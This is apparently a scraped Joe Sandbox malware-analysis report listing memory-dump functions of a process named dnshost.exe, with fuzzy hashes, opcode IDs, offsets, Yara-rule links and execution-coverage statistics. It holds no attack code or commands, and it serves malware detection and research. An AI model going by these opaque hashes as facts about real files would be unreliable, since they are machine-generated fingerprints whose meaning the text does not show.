Instruction ID: bfd9e146a5abac2ef47c72d170cf0e8eed7af61923c66fbe36bd0df9407a30a1
Opcode Fuzzy Hash: 9394d0c7416563ba3aaa5594a30b90ceb8f1a3d4c20a357dcc32d5ee0a6b37fd
Instruction Fuzzy Hash: B1212971608204DFDB05DF54EDC0B26BBA5FB84318F24C66DE9096B366C376D806CA65

Function 00E4D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2154274574.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e4d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8df014a7e7bdac30ebb59176d6ebdc972949f718382fd25b95dda937c613021f
Instruction ID: 4c2cd560e02cd9bb26503012ff24faed25025863124c01f001992e6840577102
Opcode Fuzzy Hash: 8df014a7e7bdac30ebb59176d6ebdc972949f718382fd25b95dda937c613021f
Instruction Fuzzy Hash: A421F275608200DFCB15DF14E984B26BB66EB88328F24C96DD80A5B286C33AD807CA61

Function 06BFD460 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb73b67ebc48f050fccd8dbb34b17e6f75af685e72e740bc099f2702c46bf62
Instruction ID: aaba3d41738f56378b9e4e377e6d160b0eaf9855e46fc54cb5a471f1eadd37c2
Opcode Fuzzy Hash: 8bb73b67ebc48f050fccd8dbb34b17e6f75af685e72e740bc099f2702c46bf62
Instruction Fuzzy Hash: F7312C716106008FC765DB38D898BA977E2FF84315F5584A9E14ACB361DF71AC8ACB40

Function 06BFDBA7 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77b97fa515d4c1c650aa67ee7c2627a6cb869970d495e5663bb57318057d6dd
Instruction ID: cec2e3549116ef7f31ae0ac55d1a3f1561c24e80b283b6d9b64d5f8c5909da69
Opcode Fuzzy Hash: b77b97fa515d4c1c650aa67ee7c2627a6cb869970d495e5663bb57318057d6dd
Instruction Fuzzy Hash: 2B11E6B5B241004B9B856B39985463E3BD3DFC468170911EADA16C73A4EFB8CC0BC782

Function 06BFDB10 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1adc77d5c5200ad55e58f3674b87cc0bfc99750b7776f19e664dba8e6ad162ca
Instruction ID: b4ac7fc4030d305c2b9516ce16153ebc3db85c731d9d37047352af9ea7cd83c7
Opcode Fuzzy Hash: 1adc77d5c5200ad55e58f3674b87cc0bfc99750b7776f19e664dba8e6ad162ca
Instruction Fuzzy Hash: 521104B27142404FD352EB38EC40B5A7B97EFC6351F1948A9D244CB2A6EE71EC4AC752

Function 00E4D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2154274574.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e4d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 527330cafec1d9a8f33d59d9fc63d58f3925494cb2fd84141b2c4b1c2bf6dc25
Instruction ID: 535f2eb64150afb81986eee9154075b4808234c54785cc685d50ed30bd7dee5d
Opcode Fuzzy Hash: 527330cafec1d9a8f33d59d9fc63d58f3925494cb2fd84141b2c4b1c2bf6dc25
Instruction Fuzzy Hash: 3421807550D3808FCB02CF24D994715BF72EB46314F28C5EAD8498B2A7C33A980ACB62

Function 06BFB4E0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ab8d6bd02e51b6739acb93284e051e15d929befa76c4bce2be3f733d62517c3
Instruction ID: 7a080326e1c8934caa1d434b9e1bb778f28534a9996eac75d9e6eb1548f3e31d
Opcode Fuzzy Hash: 0ab8d6bd02e51b6739acb93284e051e15d929befa76c4bce2be3f733d62517c3
Instruction Fuzzy Hash: A9117F70B106408FC755DF38C89095AF7F2AF88714B208AADD1258B3A2CB71EC0ACB51

Function 06BFD218 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff59ac400009490b431e3d958b5796a121b05caa17549fa0ebdab5c25f31d1b2
Instruction ID: df2a6f1f0dcef4d2c949e7fe8a52e05574e8caa83b3ac5938b1233cc84b1139c
Opcode Fuzzy Hash: ff59ac400009490b431e3d958b5796a121b05caa17549fa0ebdab5c25f31d1b2
Instruction Fuzzy Hash: 8F11B271720604CFC764AF78C84085ABBB5FF8621171101EDE616DB371EB32D889CBA1

Function 06BF7DA4 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d506296e61d0a0c376bcb342a5b25ff5251561dc24ac1fd15c8cf1a4bc2ba0c
Instruction ID: 94a40c51ae027689432b97aaa7e603be63fd94fb59d7b9227692877fbe96ff90
Opcode Fuzzy Hash: 3d506296e61d0a0c376bcb342a5b25ff5251561dc24ac1fd15c8cf1a4bc2ba0c
Instruction Fuzzy Hash: C51146B5750600CFDB45DF29E8848A977F6EF8820576240E5E609DB731DB31EC46CB50

Function 06BFDA2B Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afe9de7095498e550104b96e1c0d2635151f02979f96abcb66cefa8fd619d61a
Instruction ID: 8a5c8dd175770d971272f0445fa4746542bf64e388f88ee385e44d8e78ac457e
Opcode Fuzzy Hash: afe9de7095498e550104b96e1c0d2635151f02979f96abcb66cefa8fd619d61a
Instruction Fuzzy Hash: 12112BB17047818FC716677894103AE7F929F82324F144A6AD195CF2D2DF349D0A8396

Function 00E3D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2154208500.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e3d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: b24adc701a03ccd6d061c4cb85dd0246110c32f77a513ff4546ea1835691b64d
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: E1112676504280DFCB02CF10E9C4B16BF71FB94328F24C6A9D8091B256C33AD85ACBA1

Function 00E3D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2154208500.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e3d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: 489de35680d03bbbe4d03e96c54bee9cbc6f15adf26a483119b92d13e6390070
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: DB112676404240CFCF12CF10E9C4B16BF71FB94324F24C2A9D8091B256C33AE85ACBA1

Function 06BF4E38 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b41c0cdc4951413af0ad6cbd0247e4ce1981bde2204169c99ee309d880428d3
Instruction ID: 78058e4475a8973b1d9f6bf5e14ac56a331e93e7e1bec12f52c57caac08c5337
Opcode Fuzzy Hash: 5b41c0cdc4951413af0ad6cbd0247e4ce1981bde2204169c99ee309d880428d3
Instruction Fuzzy Hash: C611A0B1A202199FCB54DF6DC880AAFBBF5FF88710F004469EA24D7261D734D914CB61

Function 00E4D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2154274574.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e4d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction ID: 433f459394ddaf503a0a689797d6b0dd714ddec6b434cd4229c79b3c6f665c50
Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction Fuzzy Hash: 0211DD75908280DFCB02CF50D9C4B15FBB1FB84328F24C6ADD8495B6A6C37AD81ACB61

Function 06BF4E48 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 952fb3b42d69e0a5c0e971915ced02ffeab0773b5ca225611339be607a55ca77
Instruction ID: 08bb928d7cbec387ff88ec45034fc7457b9ccb5bad521f3facd839ef4119558d
Opcode Fuzzy Hash: 952fb3b42d69e0a5c0e971915ced02ffeab0773b5ca225611339be607a55ca77
Instruction Fuzzy Hash: DF1161B5A202199FCB55DF6DC880AAFBBF9FF48610F004469EA24D7361DB30D914CBA1

Function 06BFD208 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1a45e155af3e3b6d765630253bce957b60883cc25fca4626559ece8bce58de0
Instruction ID: 23325db440f8e01aa5647514a8c4eb6d6a078e3c2492abd1d267222341d00b5f
Opcode Fuzzy Hash: f1a45e155af3e3b6d765630253bce957b60883cc25fca4626559ece8bce58de0
Instruction Fuzzy Hash: 1D01B1727142008FC764DF39D84085ABBB5FF8621171501FEE619CB371DA32D899CBA1

Function 00E3D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2154208500.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e3d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67fe1ddc7d675fb2e76582fbcec4a9a9427bfc3ec2c5b597ab11ad3fb94af989
Instruction ID: 4cb3418afe7a18463d6c2d8b0eb1d96de6e8c8e5f2c1172c681f29a00534912c
Opcode Fuzzy Hash: 67fe1ddc7d675fb2e76582fbcec4a9a9427bfc3ec2c5b597ab11ad3fb94af989
Instruction Fuzzy Hash: F801267100C3409AE7219F29DDCCBA6BF98EF51378F18D51BFD082B286D2799840DAB1

Function 06BF4100 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e83dadb47d11a077f001ef897717b50f6fa9ff2659717a5a3301c53757c7f2d2
Instruction ID: c17ee125b52a3371a4552e8c8b4a3a7c1c96d7d0890036632b5bb1e5832abcf5
Opcode Fuzzy Hash: e83dadb47d11a077f001ef897717b50f6fa9ff2659717a5a3301c53757c7f2d2
Instruction Fuzzy Hash: 68018F702143109FD715DB68D840E27BBE6EFD6321F60C5AAE5058B366DB71ED06CB50

Function 06BF7E50 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12721d3fcb4a9445c0c943454971326283c92c17c2407186ae4b082531c10907
Instruction ID: 42380df6060362ba27380b6aa9b4a65cdfac88056049728deeb8dbf3d70582d3
Opcode Fuzzy Hash: 12721d3fcb4a9445c0c943454971326283c92c17c2407186ae4b082531c10907
Instruction Fuzzy Hash: 9DF0E9F3B346001BE7111B2958601E66B9BCBD5392B1650F7DA08CB364ED24CC178252

Function 06BFA3A7 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25986f6000f0f0da6209c1caa3437f54417b51ca857ebfd6b013a9fd8ee198f7
Instruction ID: dc5f9a769202573085bf1698d287c52169991fed9c63722dbac24c996ab0ed8d
Opcode Fuzzy Hash: 25986f6000f0f0da6209c1caa3437f54417b51ca857ebfd6b013a9fd8ee198f7
Instruction Fuzzy Hash: F9014F7450A740CFCB12DB24F9949813FB4EF0571474589DAE1188F6A7D775EC4ACB90

Function 06BF4110 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8596f31283aac9b6f6b04e5aece02583421dd42e8b5f142e554a72829a926174
Instruction ID: 4650a9f07242e38cade31ebdebc99cbb8cb4cbf664263c8f5a0dff0fcd056d8b
Opcode Fuzzy Hash: 8596f31283aac9b6f6b04e5aece02583421dd42e8b5f142e554a72829a926174
Instruction Fuzzy Hash: CA016D343243108FC755DB69D440D17B7EAEFC6221B60C5AAE6098B266DB71ED06CB90

Function 06BF5DD7 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed1f4052a911254b725e270617ee01deda099fe1b07ff00bfaf8f0e4e1d2781b
Instruction ID: 813a411e03f85736a0871b6496cbe0017f0e7f0ae4eed5e7afc468cba660ca62
Opcode Fuzzy Hash: ed1f4052a911254b725e270617ee01deda099fe1b07ff00bfaf8f0e4e1d2781b
Instruction Fuzzy Hash: 04F02DB3A101119FC3384B24A8456FBFFD1EFA8711F0541BAE14D97221C721D80ACBA1

Function 06BFCD34 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46be6fc98afd04be8e7e0bd704d819b482d0de7e721715ccace61650287cb344
Instruction ID: 0b3bb79306902d873b242c38359dde5666153c6d6afe131b86156e1fd03fe28e
Opcode Fuzzy Hash: 46be6fc98afd04be8e7e0bd704d819b482d0de7e721715ccace61650287cb344
Instruction Fuzzy Hash: 25F067B07201048BD7A5AB3D8C50B2A37D6EFC5650F0458A9D306CB266DE74EC49C792

Function 00E3D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2154208500.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e3d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83d4b89e875d2f9d376c145a6f62ade56f25e03c7ed067a463511273b315e75d
Instruction ID: a81931e90a3cb6abacc1f8d39c2dfdc58ae116f8d0e189dbd738db2c70da05f0
Opcode Fuzzy Hash: 83d4b89e875d2f9d376c145a6f62ade56f25e03c7ed067a463511273b315e75d
Instruction Fuzzy Hash: 47F062724083449EE7109E16DDC8B62FF98EB51738F18C45AFD085B286C2799844DAB1

Function 06BF7DB0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e45aebe82e244047521bf90af1619cc490b6e0819874b5dec6d5e88529b3b2ac
Instruction ID: 66fd5c4ae4d7dba17653dff7b008d3175d1e1247df24e2136d0b3e717ebae85f
Opcode Fuzzy Hash: e45aebe82e244047521bf90af1619cc490b6e0819874b5dec6d5e88529b3b2ac
Instruction Fuzzy Hash: FC014675B50100CFCB55CF29E4808A8B3B5FF8821579550FADA019B231CB32EC40CB50

Function 06BF56C9 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd0cbdd44587006818a6d6704c20fa95fd4803cd00bc1ab87f1836697b7a1f74
Instruction ID: 5bad0fd546494cc7b2b44ece29c99dbd52357d992e8d5d2a57720737563b02b2
Opcode Fuzzy Hash: cd0cbdd44587006818a6d6704c20fa95fd4803cd00bc1ab87f1836697b7a1f74
Instruction Fuzzy Hash: 7AF0E23A311205DFDB16EF38E440DEA7BEAEF8535171848A9F0489F225EA31D912CB90

Function 06BF503A Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4af5c21a9479711aa49d0298de9babf644a5636351ff853c71d74ff262779148
Instruction ID: acdc2a16e065dca9aff6d428c882ab280d76edf674eb88b5292eebda5bfa5153
Opcode Fuzzy Hash: 4af5c21a9479711aa49d0298de9babf644a5636351ff853c71d74ff262779148
Instruction Fuzzy Hash: 06F01DB5A24005CFDBD09B68D8457A837F0FB4435AF4440A5E20AA71B1CBB8899ACBA1

Function 06BF56D8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1799f2eb9501cf6b6ca6918f50a3196bc7eaa0ecf23ee8c0a5e7b10f2be56d0c
Instruction ID: 9befb8c62aff8babc3c1b9fc6689371a3fe8c060604ce9b02ebc8b6e9eafd08c
Opcode Fuzzy Hash: 1799f2eb9501cf6b6ca6918f50a3196bc7eaa0ecf23ee8c0a5e7b10f2be56d0c
Instruction Fuzzy Hash: D2F030363112059FDB15AF69E440CAA7BE9EF853613544465F5449F228EA75AC02CB90

Function 06BF7E80 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4057fc6929d603d6015f6957bd60574d6d36f24b9ce87b1c49d796763248d40f
Instruction ID: 1b46284557bd57dc3b3460f4e4ed8c5131b30fa643921951b29ae2543d0c64e8
Opcode Fuzzy Hash: 4057fc6929d603d6015f6957bd60574d6d36f24b9ce87b1c49d796763248d40f
Instruction Fuzzy Hash: 8CE04FB5B302155B6B55276D28245AA668FCBC45A231510FBAB05D7354EE34DC0582A2

Function 06BF3C30 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6063897b430062c9121174828670f0c3692736b6acea41586dedf1803dfc163
Instruction ID: e815b6ce2a35bcc1f64c23771ca49e00e7fe20e2b10ce6764b2c38b393c1c2ee
Opcode Fuzzy Hash: c6063897b430062c9121174828670f0c3692736b6acea41586dedf1803dfc163
Instruction Fuzzy Hash: E8E0DF31B541608FC7198B38A458BF87BE2AF89315F0800F9E04ACB262CE648C42CB80

Function 06BF5680 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3a6bb7a4c2ac4b2da2bfa5c2f003f0ceac094eee44d9d606a2475abc0eeb8e4
Instruction ID: 5a5e83a5f520b955e7422e53dd35a439ae8bc300ecbc29e8a3a98624c4ca75b3
Opcode Fuzzy Hash: f3a6bb7a4c2ac4b2da2bfa5c2f003f0ceac094eee44d9d606a2475abc0eeb8e4
Instruction Fuzzy Hash: EAE06D3AD0418EFBCB01CBA4D9055CEFF72EF45324F2482D9E92556282DA325A42DB81

Function 06BF4FFE Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f80ecec3ea607b23359271018d23e3c01262375932ff20eb1f6ec50bdc5df78
Instruction ID: 90c9be875769c2582a451bdd051594604de48e967a02169d861ff947a4cc8531
Opcode Fuzzy Hash: 6f80ecec3ea607b23359271018d23e3c01262375932ff20eb1f6ec50bdc5df78
Instruction Fuzzy Hash: AEE01A76A20015CFCB909F68E8487EC37F1FB44266F4440A5E119EB1B1CB79995ACB90

Function 06BF5690 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c175a598fd71c1ba8552f43b240e7c18283021564138a3d9dcb4c3334b3ad935
Instruction ID: 6f236795e46ed2d9e2ee6214560b2825d0f818c2506e9a1694e356bde851e60d
Opcode Fuzzy Hash: c175a598fd71c1ba8552f43b240e7c18283021564138a3d9dcb4c3334b3ad935
Instruction Fuzzy Hash: B6E07575D0110CFFCB40DFA4D9458DDBBB9EB48210F1081A6D905A2200EA355B159B90

Function 06BF3C40 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac34fed5b29c38bbdf5d9e6bb916c68c254c300acaa7cdfd5786482cd237ed5
Instruction ID: 61ea7ab59964c03e25ec6e483f1c4f2e0c328d61a7ef1511bc51b7e36eeb5c0e
Opcode Fuzzy Hash: cac34fed5b29c38bbdf5d9e6bb916c68c254c300acaa7cdfd5786482cd237ed5
Instruction Fuzzy Hash: 9FD012347505248FD6189B39D448BA937D9AB84715F0400A9E509C7261CE649C41CBD0

Function 06BF42E0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e11bf9c629e5543fd7e8e64d71cfffb2542dc6ef15b2c68f9dac2039286289a
Instruction ID: ee38f3ec3206e4616538fee319313ce1ceacb125188a3c2dd55e39a04e95965b
Opcode Fuzzy Hash: 6e11bf9c629e5543fd7e8e64d71cfffb2542dc6ef15b2c68f9dac2039286289a
Instruction Fuzzy Hash: 2DD05EB2204304AFEB41AF90C841E927B6AEB28714F109055F9444F251C672A962C751

Function 06BFA3B8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57165ab1edbdba663ec8f356bbf0f85b0413086d9e7a65d27e7d6d7f05b2e426
Instruction ID: d5b6add7dc46a3bc453572e106e6ef5b07ee0a5f7165d7b9e1895d87d73706d4
Opcode Fuzzy Hash: 57165ab1edbdba663ec8f356bbf0f85b0413086d9e7a65d27e7d6d7f05b2e426
Instruction Fuzzy Hash: ADD01270200208CFC705DB68EA848117BA8EF49708358C5E8E10C8F233DB72EC42CA90

Function 06BF42F0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2164572782.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6bf0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b054fbcd29f320ea78ad8d68d135f28e468448656472947dc3b7a17d88a32c5
Instruction ID: 79e3e699c0f1f7aefcad5a1a1a1f46e33755c546bc39c9275819cd8e4525b683
Opcode Fuzzy Hash: 6b054fbcd29f320ea78ad8d68d135f28e468448656472947dc3b7a17d88a32c5
Instruction Fuzzy Hash: 8EC08C76200208FFDB80AFD4C801E96776DAB18B14F50D110FA080F201C272E862DBA1

Analysis Process: dnshost.exePID: 8108, Parent PID: 8060COMMON

Execution Graph

Execution Coverage:	7.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	67
Total number of Limit Nodes:	7

Executed Functions

Function 02ECD418 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02ECD496
